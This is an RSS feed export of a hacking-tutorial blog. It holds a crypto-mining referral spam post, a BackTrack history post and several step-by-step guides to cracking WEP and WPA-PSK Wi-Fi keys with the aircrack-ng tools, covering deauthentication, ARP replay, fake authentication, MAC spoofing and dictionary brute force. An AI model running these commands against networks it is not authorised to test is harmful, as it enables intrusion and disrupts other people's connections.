<?xml version="1.0" encoding="UTF-8" standalone="no"?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><rss xmlns:itunes="http://www.itunes.com/dtds/podcast-1.0.dtd" version="2.0"><channel><title>Kluwan Backtrack</title><description>All About Backtrack and free Software</description><managingEditor>noreply@blogger.com (Mr. X)</managingEditor><pubDate>Fri, 1 Nov 2024 03:37:31 -0700</pubDate><generator>Blogger http://www.blogger.com</generator><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">82</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><link>http://kluwanbacktrack.blogspot.com/</link><language>en-us</language><itunes:explicit>no</itunes:explicit><itunes:subtitle>All About Backtrack and free Software</itunes:subtitle><itunes:owner><itunes:email>noreply@blogger.com</itunes:email></itunes:owner><item><title>Hashes Free From Noobminer</title><link>http://kluwanbacktrack.blogspot.com/2017/12/hashes-free-from-noobminer.html</link><author>noreply@blogger.com (Mr. X)</author><pubDate>Thu, 21 Dec 2017 07:38:00 -0800</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-368422748555906316</guid><description>
Christmas is here!
During December you will receive double the hashes for all your referrals.
Instead of 2 million hashes, you will get 4 million!
Invite all your friends!


&lt;a href="https://noobminer.com/?ref=gSpYDIv4zh" target="_blank"&gt;please click here&lt;/a&gt;

Referral Link (Share this with your friends and receive bonus hashes)
&lt;a href="https://noobminer.com/?ref=gSpYDIv4zh" target="_blank"&gt;yes&lt;/a&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to WPA Crack</title><link>http://kluwanbacktrack.blogspot.com/2010/05/how-to-wpa-crack.html</link><category>backtrack</category><category>bt3</category><category>bt4 beta</category><category>BT4 final</category><category>cracking</category><category>daftar isi</category><category>download wpa tkip</category><category>final free</category><category>free dowload</category><category>free programming</category><category>hacking</category><category>Hacking Tools</category><category>password</category><category>tutorial gratis</category><category>WEP</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Thu, 13 May 2010 11:41:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-4376897342195177123</guid><description>&lt;h3&gt;Differences&lt;/h3&gt;WPA is an encryption algorithm that takes care of a lot of the  vunerablities inherent in WEP.  WEP is, by design, flawed.  No matter  how good or crappy, long or short, your WEP key is, it can be cracked.   WPA is different.  &lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;A WPA key &lt;i&gt;can&lt;/i&gt; be made good enough to make  cracking it unfeasible.  WPA is also a little more cracker friendly.  By  capturing the right type of packets, you can do your cracking offline.   This means you only have to be near the AP for a matter of seconds to  get what you need.  Advantages and disadvantages. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="WPA_Flavours"&gt;&lt;/a&gt;&lt;h3&gt;WPA Flavours&lt;/h3&gt;WPA basically comes in two flavours RADIUS or PSK.  PSK is crackable,  RADIUS is not so much. &lt;br /&gt;
PSK uses a user defined password to initialize the TKIP, temporal  key integrity protocol.  There is a password and the user is involved,  for the most part that means it is flawed.  The TKIP is not really  crackable as it is a per-packet key but upon the initialization of the  TKIP, like during an authentication, we get the password (well the PMK  anyways).  A robust dictionary attack will take care of a lot of  consumer passwords. &lt;br /&gt;
Radius involves physical transferring of the key and encrypted  channels blah blah blah, look it up to learn more about it but 90% of  commerical APs do not support it, it is more of an enterprise solution  then a consumer one. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="The_Handshake"&gt;&lt;/a&gt;&lt;h3&gt;The Handshake&lt;/h3&gt;The WPA handshake was designed to occur over insecure channels and in  plaintext so the password is not actually sent across.  There are some  fancy dancy algorithms in the background that turn it into a primary  master key, PMK, and the like but none of that really matters cause the  PMK is enough to connect to the network. &lt;br /&gt;
The only step we need to do is capture a full authenication  handshake from a real client and the AP.  This can prove tricky without  some packet injection, but if you are lucky to capture a &lt;b&gt;full&lt;/b&gt;  handshake, then you can leave and do the rest of the cracking at home. &lt;br /&gt;
We can force an authenication handshake by launching a Deauthentication Attack, but &lt;b&gt;only&lt;/b&gt; if there is a  real client already connected (you can tell in airodump).  If there are  no connected clients, you're outta luck. &lt;br /&gt;
Like for WEP, we want to know the channel the WPA is sitting on,  but the airodump command is slightly different.  We don't want just IVs  so we don't specify an IV flag.  This will produce "lucid.cap" instead  of "lucid.ivs".  Assume WPA is on channel 6 and wireless interface is  ath0. &lt;br /&gt;
&lt;pre&gt;./airodump ath0 lucid 6&lt;/pre&gt;&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Dictionary_Brute_Force"&gt;&lt;/a&gt;&lt;h3&gt;Dictionary Brute Force&lt;/h3&gt;The most important part of brute forcing a WPA password is a good  dictionary.  Check out http://www.openwall.com/wordlists/ for a '&lt;b&gt;really'&lt;/b&gt;  good one.  It costs money, but its the biggest and best I've ever seen  (40 Million words, no duplicates, one .txt file).  There is also a free  reduced version from the same site but i'm sure resourceful people can  figure out where to get a good dictionary from. &lt;br /&gt;
When you have a good dictionary the crack is a simple brute force  attack: &lt;br /&gt;
&lt;pre&gt;./aircrack -a 2 -b 00:23:1F:55:04:BC -w /path/to/wordlist&lt;/pre&gt;Either you'll get it or you won't... depends on the strength of the  password and if a dictionary attack can crack it. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Using_Aireplay"&gt;&lt;/a&gt;&lt;h2&gt;Using Aireplay&lt;/h2&gt;Aireplay is the fun part.  You get to manipulate packets to trick the  network into giving you what you want. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="WEP_Attacks"&gt;&lt;/a&gt;&lt;h3&gt;WEP Attacks&lt;/h3&gt;Attacks used to create more traffic on WEP networks to get more IVs. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="ARP_Injection"&gt;&lt;/a&gt;&lt;h4&gt;ARP Injection&lt;/h4&gt;ARP Replay is a classic way of getting more IV traffic from the AP.   It is the turtle.  Slow but steady and almost always works.  We need the  BSSID of the AP and the BSSID of an associated client.  If there are no  clients connected, it is possible to create one with &lt;i&gt;another&lt;/i&gt; WEP  attack explained below: Fake Authentication Attack. &lt;br /&gt;
With airodump listening, we attack: &lt;br /&gt;
&lt;pre&gt;./aireplay -3 -b &lt;ap address="" mac=""&gt; -h &lt;client address="" mac=""&gt; ath0&lt;/client&gt;&lt;/ap&gt;&lt;/pre&gt;&lt;i&gt;Note:&lt;/i&gt; The -3 specifys the type of attack (3=ARP Replay). &lt;br /&gt;
This will continue to run, and airodump, listening fron another  terminal, will pick up any reply IVs. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Interactive_Packet_Replay"&gt;&lt;/a&gt;&lt;h4&gt;Interactive Packet Replay&lt;/h4&gt;Interactive Packet Reply is quite a bit more advanced and requires  capturing packets and constructing your own.  It can prove more  effective then simple ARP requests but I won't get into packet  construction here. &lt;br /&gt;
A useful attack you might try is the re-send all data attack,  basically you are asking the AP to re-send you everything.  This only  works if the AP re-encrypts the packets before sending them again (and  therefore giving you a new IV).  Some APs do, some don't. &lt;br /&gt;
&lt;pre&gt;aireplay -2 -b &lt;ap mac=""&gt; -h &lt;client mac=""&gt; -n 100 -p 0841 -c FF:FF:FF:FF:FF:FF ath0&lt;/client&gt;&lt;/ap&gt;&lt;/pre&gt;&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Fake_Authentication_Attack"&gt;&lt;/a&gt;&lt;h4&gt;Fake Authentication Attack&lt;/h4&gt;This attack won't generate any more traffic but it does create an  associative client MAC Address useful for the above two attacks.  Its  definately not as good as having a real, connected client, but you gots  to do what you gots to do. &lt;br /&gt;
This is done easiest with another machine because we need a new  MAC address but if you can manually change your MAC then that'll work  too.  We'll call your new MAC address "Fake MAC". &lt;br /&gt;
Now most APs need clients to reassociate every 30 seconds or so  or they think they're disconnected.  This is pretty arbitrary but I use  it and it has worked but if your Fake MAC gets disconnected, reassociate  quicker.  We need &lt;b&gt;both&lt;/b&gt; the essid and bssid and our Fake MAC. &lt;br /&gt;
&lt;pre&gt;./aireplay -1 30 -e '&lt;essid&gt;' -a &lt;bssid&gt; -h &lt;fake mac=""&gt; ath0&lt;/fake&gt;&lt;/bssid&gt;&lt;/essid&gt;&lt;/pre&gt;If successful, you should see something like this: &lt;br /&gt;
&lt;pre&gt;23:47:29  Sending Authentication Request
 23:47:29  Authentication successful
 23:47:30  Sending Association Request
 23:47:30  Association successful&amp;nbsp;:-)&lt;/pre&gt;Awesome!  Now you can use the above two attacks even though there  were no clients connected in the first place!  If it fails, there may be  MAC Address Filtering on so if you really want to use this, you'll have  to sniff around until a client provides you with a registered MAC to  fake. &lt;br /&gt;
&lt;a href="" name="WPA_Attacks"&gt;&lt;/a&gt;&lt;h3&gt;WPA Attacks&lt;/h3&gt;So far, the only way to really crack WPA is to force a  re-authentication of a &lt;i&gt;valid&lt;/i&gt; client.  We need a real, actively  connected client to break WPA.  You might have to wait a while. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Deauthentication_Attack"&gt;&lt;/a&gt;&lt;h4&gt;Deauthentication Attack&lt;/h4&gt;This is a simple and very effective attack.  We just force the  connected client to disconnect then we capture the re-connect and  authentication, saves time so we don't have to wait for the client to do  it themselves (a tad less "waiting outside in the car" creepiness as  well).  With airodump running in another console, your attack will look  something like this: &lt;br /&gt;
&lt;pre&gt;aireplay -0 5 -a &lt;ap mac=""&gt; -c &lt;client mac=""&gt; ath0&lt;/client&gt;&lt;/ap&gt;&lt;/pre&gt;After a few seconds the re-authentication should be complete and we  can attempt to  Dictionary Brute Force the PMK. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Conclusion"&gt;&lt;/a&gt;&lt;h2&gt;Conclusion&lt;/h2&gt;Well thats that.  APs crack fairly often but sometimes there is just  nothing you can do.  &lt;i&gt;Obviously&lt;/i&gt; you are not allowed to illegally  crack other people's wireless connections, this is purely for  penetration testing purposes and some fun.</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to WEP Crack</title><link>http://kluwanbacktrack.blogspot.com/2010/05/how-to-wep-crack.html</link><category>backtrack</category><category>bt3</category><category>bt4 beta</category><category>BT4 final</category><category>cracking</category><category>daftar isi</category><category>download free</category><category>download wpa tkip</category><category>final free</category><category>free dowload</category><category>free programming</category><category>hacking</category><category>Hacking Tools</category><category>password</category><category>software</category><category>WEP</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Thu, 13 May 2010 11:37:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-6089448565317315685</guid><description>&lt;h3&gt; Theory &lt;/h3&gt;A little theory first.  WEP is a really crappy and old encryption  techinque to secure a wireless connection.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;  A 3-byte vector, called an &lt;i&gt;Initalization  Vector&lt;/i&gt; or &lt;i&gt;IV&lt;/i&gt;, is prepended onto packets and its based on a  pre-shared key that all the authenticated clients know... think of it as  the network key you need to authenticate. &lt;br /&gt;
Well if its on &lt;small&gt;(almost)&lt;/small&gt; &lt;i&gt;every&lt;/i&gt; packet  generated by the client or AP, then if we collect enough of them, like a  few hundred thousand, we should be able to dramatically reduce the  keyspace to check and brute force becomes a realistic proposition. &lt;br /&gt;
A couple of things will cause us some problems.   &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;If the key is not static, then you'll mix up all your IVs and  it'll take forever to decrypt the key. &lt;/li&gt;
&lt;li&gt;Theres no traffic, therefore no packets - we can fix this. &lt;/li&gt;
&lt;li&gt;MAC Address Filtering - we can fix this too.&lt;/li&gt;
&lt;/ul&gt;&lt;a href="" name="Setting_up_your_tools"&gt;&lt;/a&gt;&lt;h3&gt; Setting up your tools&lt;/h3&gt;We're gonna need 3 or 4 shells open, we have 5 tools: &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;airodump - Grabbing IVs &lt;/li&gt;
&lt;li&gt;aircrack - Cracking the IVs &lt;/li&gt;
&lt;li&gt;airdecap - Decoding captured packets &lt;/li&gt;
&lt;li&gt;airreplay - (My Favourite) Packet injector to attack APs. &lt;/li&gt;
&lt;li&gt;kismet - Network Sniffer, can grab IVs as well. &lt;/li&gt;
&lt;/ul&gt;For a standard WEP hack we'll usally only need airodump, aircrack,  and kismet (server and client).  If we run into some problems we might  have to use airreplay to fiddle about. &lt;br /&gt;
I'll leave you to config all these tools up, for the most part  they should just be defaults with the exception of kismet. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Finding_the_Network"&gt;&lt;/a&gt;&lt;h3&gt; Finding the Network &lt;/h3&gt;First step is we need to find a netork to crack.  Start up kismet and  start sniffing for APs.  Leave it on for a bit so that it can discover  all the important information about the networks around.  What we want  from kismet is: &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Encryption type: Is it WEP 64-bit? 128-bit? &lt;/li&gt;
&lt;li&gt;What channel is it on? Can &lt;i&gt;greatly&lt;/i&gt; speed up IV  collection. &lt;/li&gt;
&lt;li&gt;AP's IP Address &lt;/li&gt;
&lt;li&gt;BSSID &lt;/li&gt;
&lt;li&gt;ESSID &lt;/li&gt;
&lt;/ul&gt;All this info isn't required but the more you have, the more options  you have later to crack and sniff.  We can get a lot of this from  airodump as well but I find the &lt;i&gt;channel&lt;/i&gt; is important. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Capturing_IVs"&gt;&lt;/a&gt;&lt;h3&gt; Capturing IVs &lt;/h3&gt;Alright, we know what we wanna crack, so lets start capturing  packets.  You can use kismet to capture files but I prefer airodump  because it keeps a running count of all the IVs I've captured and I can  crack and airodump will automatically update aircrack with new IVs as it  finds them. &lt;br /&gt;
&lt;i&gt;Note:&lt;/i&gt; kimset can interfere with airodump so make sure you  close it down before starting airodump. &lt;br /&gt;
Airodump is pretty straight forward with its command line looking  something like this: &lt;br /&gt;
&lt;pre&gt;./airodump &lt;interface&gt; &lt;output prefix=""&gt; [channel] [IVs flag]&lt;/output&gt;&lt;/interface&gt;&lt;/pre&gt;&lt;ul&gt;&lt;li&gt;interface is your wireless interface to use - required. &lt;/li&gt;
&lt;li&gt;output prefix is just the filname it'll prepend, - required. &lt;/li&gt;
&lt;li&gt;channel is the specific channel we'll scan, leave blank or use 0  to channel hop. &lt;/li&gt;
&lt;li&gt;IVs flag is either 0 or 1, depending on whether you want &lt;i&gt;all&lt;/i&gt;  packets logged, or just IVs. &lt;/li&gt;
&lt;/ul&gt;My wireless card is ath0, output prefix i'll use "lucid", the channel  we sniffed from kismet is 6, and IVs flag is 1 because we just want  IVs.  So we run: &lt;br /&gt;
&lt;pre&gt;./airodump ath0 lucid 6 1&lt;/pre&gt;Airodump will come up with a graph showing us all the APs and their  relevant info, as well as client stations connected to any of the APs. &lt;br /&gt;
&lt;pre&gt;BSSID              PWR  Beacons   # Data  CH  MB  ENC   ESSID
 
 00:23:1F:55:04:BC   76    21995   213416   6  54. WEP   hackme 
 
 BSSID              STATION            PWR  Packets  Probes
 
 00:23:1F:55:04:BC  00:12:5B:4C:23:27  112     8202  hackme
 00:23:1F:55:04:BC  00:12:5B:DA:2F:6A   21     1721  hackme&lt;/pre&gt;The second line shows us some info about the AP as well as the number  of beacons and data packets we've collected from the AP.  The two last  lines show us two authenticated clients.  Where they are connected to  and the packets they are sending.  We won't use this client info in a  straight theory hack but in practice we'll need this info to actively  attack the AP. &lt;br /&gt;
This step may take a long time or could be very short.  It  depends how busy the AP is and how many IVs we are collecting.  What we  are doing is populating a file "lucid.ivs" with all the IV important  packet info.  Next, we'll feed this to aircrack.  To move onto the next  step, we'll want at least 100,000 packets (under # Data in airodump) but  probably more. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Using_IVs_to_Decrypt_the_Key"&gt;&lt;/a&gt;&lt;h3&gt; Using IVs to Decrypt the  Key &lt;/h3&gt;Ok, pretend you have enough IVs now to attempt a crack. Goto a new  terminal (without stopping airodump - remember it'll autoupdate as new  IVs are found) and we'll start aircrack.  It looks something like this: &lt;br /&gt;
&lt;pre&gt;./aircrack [options] &lt;input file="" /&gt;&lt;/pre&gt;There are a lot of options so you can look them up yourself, i'll be  using common ones here that should get you a crack.  Our input file is  "lucid.ivs", the options we will use are: &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;-a 1&amp;nbsp;: forces a WEP attack mode (2 forces WPA) &lt;/li&gt;
&lt;li&gt;either -b for the bssid or -e for the essid&amp;nbsp;: whichever is  easier to type but I like using a BSSID because its more unique. &lt;/li&gt;
&lt;li&gt;-n 64 or -n 128&amp;nbsp;: WEP key length, omit if not known by now. &lt;/li&gt;
&lt;/ul&gt;So our command will look like: &lt;br /&gt;
&lt;pre&gt;./aircrack -a 1 -b 00:23:1F:55:04:BC -n 128 lucid.ivs&lt;/pre&gt;and off it goes, resembling the picture from the top.  Keep an eye on  the Unique IV count as it should increase if airodump is still running.   For all intents and purposes you are done.  That'll pop open most old  wireless routers with some traffic on them. &lt;br /&gt;
&lt;div class="editsection" style="float: right; margin-left: 5px;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;a href="" name="Anticipated_Problems"&gt;&lt;/a&gt;&lt;h3&gt; Anticipated Problems &lt;/h3&gt;There are lots of problems that can come up that will make the above  fail, or work very slowly. &lt;br /&gt;
&lt;ul&gt;&lt;li&gt;No traffic &lt;ul&gt;&lt;li&gt;No traffic is being passed, therefore you can't capture any IVs.   &lt;/li&gt;
&lt;li&gt;What we need to do is inject some special packets to trick the  AP into broadcasting.   &lt;/li&gt;
&lt;li&gt;Covered below in WEP Attacks &lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;MAC Address filtering &lt;ul&gt;&lt;li&gt;AP is only responding to connected clients.  Probably because  MAC address filtering is on.   &lt;/li&gt;
&lt;li&gt;Using airodumps screen you can find the MAC address of  authenticated users so just change your MAC to theirs and continue on. &lt;/li&gt;
&lt;li&gt;Using the -m option you can specify aircrack to filter packets  by MAC Address, ex. -m 00:12:5B:4C:23:27 &lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Can't Crack even with tons of IVs &lt;ul&gt;&lt;li&gt;Some of the statistical attacks can create false positives and  lead you in the wrong direction. &lt;/li&gt;
&lt;li&gt;Try using -k N (where N=1..17) or -y to vary your attack  method. &lt;/li&gt;
&lt;li&gt;Increase the fudge factor.  By default it is at 2, by  specifying -f N (where N&amp;gt;=2) will increase your chances of a crack,  but take much longer.  I find that doubling the previous fudge factor is  a nice progression if you are having trouble. &lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Still Nothing &lt;ul&gt;&lt;li&gt;Find the AP by following the signal strength and ask the admin  what the WEP key is. &lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to Crack WEP Keys on Backtrack</title><link>http://kluwanbacktrack.blogspot.com/2010/04/how-to-crack-wep-keys-on-backtrack.html</link><category>bt3</category><category>bt4 beta</category><category>BT4 final</category><category>hacking</category><category>Hacking Tools</category><category>WEP</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Fri, 23 Apr 2010 22:17:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-836514331355409351</guid><description>&lt;strong&gt;Allright now you should be in Backtrack the desktop should be   all loaded and you should be ready to start cracking those WEP Keys.&lt;a name='more'&gt;&lt;/a&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;1. First you must click on the Terminal icon in the bottom   toolbar it looks like a black TV.&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;2. Now you must type in airmon-ng the command will display a   card name which you will need to remember and&amp;nbsp;substitute&amp;nbsp;for the  “eth1″.&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;3. Now type airmon-ng stop “eth1″.&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;4.Now type ifconfig “eth1″ down&lt;/strong&gt;&lt;br /&gt;
5.Now type macchanger –mac 00:11:22:33:44:55 “eth1″&lt;br /&gt;
6.Now type airmon-ng start “eth1″&lt;br /&gt;
7.Now type airodump-ng “eth1″&lt;br /&gt;
*You need to note the Channel, The BSSID, and the ESSID to crack.*&lt;br /&gt;
8.Now type airodump-ng -c “whatever channel” -w   “whateverfilenameuwant” –BSSID “whateverbssid” “eth1″&lt;br /&gt;
*Make sure that you leave this window open so run a new Terminal.*&lt;br /&gt;
9.aireplay-ng -1 0 -a “bssid” -h 00:11:22:33:44:55 “eth1″&lt;br /&gt;
*Leave this windows open.*&lt;br /&gt;
10.aireplay-ng -3 -b “bssid -h 00:11:22:33:44:55 “eth1″&lt;br /&gt;
*Leave this window open.*&lt;br /&gt;
11. Now go back and wait for the Data to hit 1000 IVS than run the   next command.&lt;br /&gt;
*This is for a 32 bit WEP.*&lt;br /&gt;
11.aircrack-ng -b “bssid” “whateverfilename”.&lt;br /&gt;
The key that is displayed</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>How to crack wpa - psk</title><link>http://kluwanbacktrack.blogspot.com/2010/04/how-to-crack-wpa-psk.html</link><category>daftar isi</category><category>hacking</category><category>Hacking Tools</category><category>tips dan trick</category><category>tutorial</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Fri, 23 Apr 2010 16:13:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-4269966340486286060</guid><description>As I mentioned in a previous blog, my team is working on a project where  we perform a Man-in-the-Middle (MitM) attack on a WEP encrypted  wireless network.&lt;a name='more'&gt;&lt;/a&gt;  The point of the project is to demonstrate how quick  and easy it is to hack a WEP encrypted wireless network and to discuss  and encourage additional methods of wireless security. &lt;br /&gt;
&lt;br /&gt;
As I searched for useful hack tools I became especially excited  about &lt;a href="http://www.grape-info.com/doc/linux/config/aircrack-2.3.html"&gt;Aircrack&lt;/a&gt;.  Aircrack is a package of great wireless auditing tools.  It includes:&lt;br /&gt;
&lt;ul&gt;&lt;li&gt;Airodump: 802.11 packet capture program &lt;/li&gt;
&lt;li&gt;Aireplay: 802.11 packet injection program &lt;/li&gt;
&lt;li&gt;Aircrack: static WEP and WPA-PSK key cracker &lt;/li&gt;
&lt;li&gt;Airdecap: decrypts WEP/WPA capture file&lt;/li&gt;
&lt;/ul&gt;The amount of time it takes to hack an encrypted wireless network is  dependent on the amount of traffic.  Less traffic means the hack will  take more time and vise versa.  That's why the Aireplay tool is so  exciting.  It is basically a traffic generator, which enables the hacker  to up the networks traffic level, thus speeding up the hack. &lt;br /&gt;
&lt;br /&gt;
The other tools that caught my interest are Aircrack and Airdecap  because they work for both WEP and WPA encryption, which in my  experience thus far hacking tools are typically limited to WEP. &lt;br /&gt;
&lt;br /&gt;
All IT/Tech geeks know that WEP can be cracked with relative ease,  but what is not as well know is how quick/easy it is to crack WPA-PSK  encrypted network.  Since the tool exists we've decided to expand our  scope to cracking a WPA-PSK encrypted network rather then a WEP  encrypted network. &lt;br /&gt;
&lt;br /&gt;
Now all of my comments on Aircrack thus far are only based on  research.  Hopefully we will be able to play with these tools tonight  and find out how well they work.  I will be sure to give a review of the  package once we've finished our work. &lt;br /&gt;
&lt;br /&gt;
If anyone has experience with this package I welcome your  comments/lessons learned.&lt;br /&gt;
Source : http://it.toolbox.com/blogs/unwired/cracking-wpapsk-6730</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>BackTrack History</title><link>http://kluwanbacktrack.blogspot.com/2010/04/backtrack-history.html</link><category>backtrack</category><category>bt3</category><category>bt4 beta</category><category>BT4 final</category><category>cara instal backtrack</category><category>daftar isi</category><category>free dowload</category><category>hacking</category><category>Hacking Tools</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Thu, 22 Apr 2010 17:46:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-4783529185647223769</guid><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_-of_mDCZBU4/S9Ds-ssfeUI/AAAAAAAAA-4/jRy9rItjP1E/s1600/Auditor-cd-label-small-300x300.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://4.bp.blogspot.com/_-of_mDCZBU4/S9Ds-ssfeUI/AAAAAAAAA-4/jRy9rItjP1E/s200/Auditor-cd-label-small-300x300.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;The BackTrack distribution originated from the Linux counterparts  WHAX and Max Moser's Auditor Security Collection - "The Swiss Army Knife  for security assessments". Both where focused on Linux-based  penetration tests. &lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;While WHAX was packed with more features, Auditor was  based on structure and stability. Auditor featured well-laid-out menus  for its collection of over 300 tools for troubleshooting, network and  systems-fortifying. Its user-friendliness resulted in enhanced usability  for penetration testing which led to the formulation of the BackTrack  security testing distribution. The Auditor Security Collection was a  Live CD based on Knoppix. &lt;br /&gt;
WHAX, a name derived from White-Hat and SLAX, was a distribution  designed for security tasks. WHAX emerged from Whoppix, a Knoppix-based  security distro. When Whoppix reached version 3.0 it was renamed as  WHAX, to reflect the change of parent distribution from Knoppix to SLAX.  Customized by Mati Aharoni, a security consultant, WHAX made its  central focus on penetration testing. WHAX made it possible to test and  verify the security of a network from many computers located in various  places. &lt;br /&gt;
The first real BackTrack release was available to the public in the  early 2007. It was a major step in advance compared to all the other  security penetration testing distros available. Through the years and  the releases the distro became the standard as penetration testing  toolkit all over the world. Major companies like SANS or even the FBI  where using the CD-ROM as base for their work. The demand for such a  tool-suite was immense. Release "pre-4" has been downloaded over  4'000'000 times. The IRC channels and also the E-Mail and Forum entries  became larger and lager. The community became so big that Backtrack  needed a lot of help from the community. &lt;br /&gt;
Now at the early 2010 BackTrack encounters again a major change......</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://4.bp.blogspot.com/_-of_mDCZBU4/S9Ds-ssfeUI/AAAAAAAAA-4/jRy9rItjP1E/s72-c/Auditor-cd-label-small-300x300.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Tutorial Cara Cracking / Bobol Password Hotspot WPA-PSK Dengan Linux Ubuntu</title><link>http://kluwanbacktrack.blogspot.com/2010/04/tutorial-cara-cracking-bobol-password.html</link><category>all for free tool your downloads</category><category>cracking</category><category>daftar isi</category><category>hacking</category><category>Hacking Tools</category><category>tips dan trick</category><category>tutorial gratis</category><category>wireless</category><category>wpa</category><author>noreply@blogger.com (Mr. X)</author><pubDate>Wed, 21 Apr 2010 17:38:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-6919246780552194329.post-418983939093173872</guid><description>&lt;div class="post-entry"&gt;     &lt;div style="text-align: justify;"&gt;Kali ini, aku akan mencoba sedkit  memberi penejelasan bagaimana sih cara membobol password hotspot yang  bertipe wpa-psk dengan mudah. &lt;/div&gt;&lt;a name='more'&gt;&lt;/a&gt;Cara ini bisa menggunakan linux backtrack 4  dinal release atau linux apapun tertama asal sudah terinstall aplikasi  aircrack-ng. Nda berlama-lama mari simak artikel berikut.&lt;span id="more-144"&gt;&lt;/span&gt;&lt;br /&gt;
